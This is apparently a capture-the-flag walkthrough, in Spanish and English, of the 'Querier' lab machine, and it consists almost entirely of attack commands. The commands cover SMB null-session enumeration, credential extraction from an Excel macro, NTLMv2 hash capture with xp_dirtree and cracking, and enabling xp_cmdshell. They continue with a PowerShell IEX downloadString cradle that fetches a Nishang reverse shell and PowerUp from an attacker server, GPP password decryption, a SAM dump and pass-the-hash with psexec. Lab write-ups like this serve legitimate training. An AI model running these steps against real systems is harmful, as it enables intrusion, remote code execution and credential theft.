
Querier

   Dec 27, 2022     4 min read

¡Hola, esta es la máquina Querier! Let’s hack!

RECON

ping -c 1 <IP>
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP> -oG ports
extractports <ports>
nmap -sCV -p<PORTS> <IP> -oG services

AD DOMAIN DETECTION

crackmapexec smb <IP>
sudo su
nvim /etc/hosts
<IP>	<DOMAIN>

SMB ENUM

smbclient -L <IP> -N
crackmapexec smb <IP> --shares
smbmap -H <IP>
smbmap -H <IP> -u 'null'
smbmap -H <IP> -u none
smbmap -H <IP> --no-banner

SMB NULL SESSION

smbmap -H <IP> -u 'null' -r Reports
smbclient //<IP>/Reports -N
dir
get "Currency Volume Report.xlsm"
exit

OPENING XLSM FILE

libreoffice "Currency Volume Report.xlsm"
# INSTALAR OLEVBA
apt install python2-oletools
olevba2 "Currency Volume Report.xlsm"
olevba2 -c "Currency Volume Report.xlsm"
# CREDENCIALES OBTENIDAS EN LA CADENA DE CONEXIÓN

CREATING CREDENTIALS.TXT FILE

nvim credentials.txt
reporting:<PASSWORD>

VALIDATING REPORTING USER CREDENTIALS

crackmapexec smb <IP> -u reporting -p <PASSWORD>
crackmapexec smb <IP> -u reporting -p <PASSWORD> -d WORKGROUP
crackmapexec winrm <IP> -u reporting -p <PASSWORD> -d WORKGROUP

MSSQLCLIENT REPORTING USER ACCESS

impacket-mssqlclient.py WORKGROUP/reporting@<IP> -windows-auth
<PASSWORD>

SQL LOCAL ENUM

xp_cmdshell "whoami"
# LISTAR OPCIONES AVANZADAS
sp_configure "show advanced options", 1
# HABILITAR XP_CMDSHELL
sp_configure "xp_cmdshell", 1

CAPTURING REPORTING NTLMv2 HASH (XP_DIRTREE + SMBSERVER.PY)

# MÁQUINA ATACANTE
smbserver.py smbFolder $(pwd) -smb2support

# MÁQUINA VÍCTIMA
xp_dirtree "\\<IP>\smbFolder\"

# HASH NTLMv2 CAPTURADO

CRACKING REPORTING NTLMv2 HASH

echo <HASH> > hash
john -w:/usr/share/wordlists/rockyou.txt hash
# HASH CRACKED > PASSWORD_2 + USER

UPDATING CREDENTIALS.TXT FILE

nvim credentials.txt
reporting:<PASSWORD>
mssql-svc:<PASSWORD_2>

VALIDATING MSSQL-SVC USER CREDENTIALS

crackmapexec smb <IP> -u mssql-svc -p <PASSWORD_2> -d WORKGROUP
crackmapexec winrm <IP> -u mssql-svc -p <PASSWORD_2> -d WORKGROUP

MSSQLCLIENT MSSQL-SVC USER ACCESS

impacket-mssqlclient.py WORKGROUP/mssql-svc@<IP> -windows-auth
<PASSWORD_2>

XP_CMDSHELL AVAILABLE

xp_cmdshell "whoami"
# LISTAR OPCIONES AVANZADAS
sp_configure "show advanced options", 1
reconfigure
# HABILITAR XP_CMDSHELL
sp_configure "xp_cmdshell", 1
reconfigure
xp_cmdshell "whoami"

GRANTED ACCESS MSSQL-SVC USER (NISHANG REVERSE SHELL)

# MÁQUINA ATACANTE
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
mv Invoke-PowerShellTcp.ps1 ps.ps1
nvim ps.ps1
# AGREGAR EN LA ÚLTIMA LÍNEA DEL SCRIPT
Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <PORT>
# COMPARTO SERVICIO HTTP PYTHON
python3 -m http.server 80
# CREAR UN LISTENER CON RLWRAP + NC
rlwrap nc -nlvp <PORT>

# MÁQUINA VÍCTIMA
xp_cmdshell "powershell IEX(New-Object Net.WebClient).downloadString(\"http://<IP>/ps.ps1\")"

# CONSOLA INTERACTIVA
whoami

FLAG USER.TXT

cmd /c dir /r /s user.txt
type C:\Users\mssql-svc\Desktop\user.txt

AD LOCAL ENUM

whoami /priv
whoami /all
net group
net user
net user mssql-svc

AD ENUM (POWERUP.PS1)

# MÁQUINA ATACANTE
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
nvim PowerUp.ps1
# AGREGAR EN LA ÚLTIMA LÍNEA DEL SCRIPT
Invoke-AllChecks
# COMPARTO SERVICIO HTTP PYTHON
python3 -m http.server 80

# MÁQUINA VÍCTIMA
IEX(New-Object Net.WebClient).downloadString('http://<IP>/PowerUp.ps1')

# OBTENEMOS PASSWORD DEL USUARIO ADMINISTRATOR

EXPLORING GROUPS.XML

type "C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml"
<CPASSWORD>

DECRYPT GROUPS.XML PASSWORD

gpp-decrypt '<CPASSWORD>'
<A_PASSWORD>

DUMPING SAM (HASHES)

crackmapexec smb <IP> -u 'Administrator' -p '<A_PASSWORD>' -d WORKGROUP --sam

GRANTED ACCESS ADMINISTRATOR USER

crackmapexec smb <IP> -u 'Administrator' -p '<A_PASSWORD>' -d WORKGROUP
crackmapexec winrm <IP> -u 'Administrator' -p '<A_PASSWORD>' -d WORKGROUP

# ACCESO CON EVIL-WINRM
evil-winrm -i <IP> -u 'Administrator' -p '<A_PASSWORD>'
whoami

# ACCESO CON PSEXEC
psexec.py WORKGROUP/Administrator@<IP> cmd.exe
whoami

GRANTED ACCESS ADMINISTRATOR USER (PASS THE HASH)

crackmapexec smb <IP> -u 'Administrator' -p '<A_PASSWORD>' -d WORKGROUP --sam
psexec.py WORKGROUP/Administrator@<IP> -hashes <LMHASH:NTHASH>
whoami

FLAG ROOT.TXT

type C:\Users\Administrator\Desktop\root.txt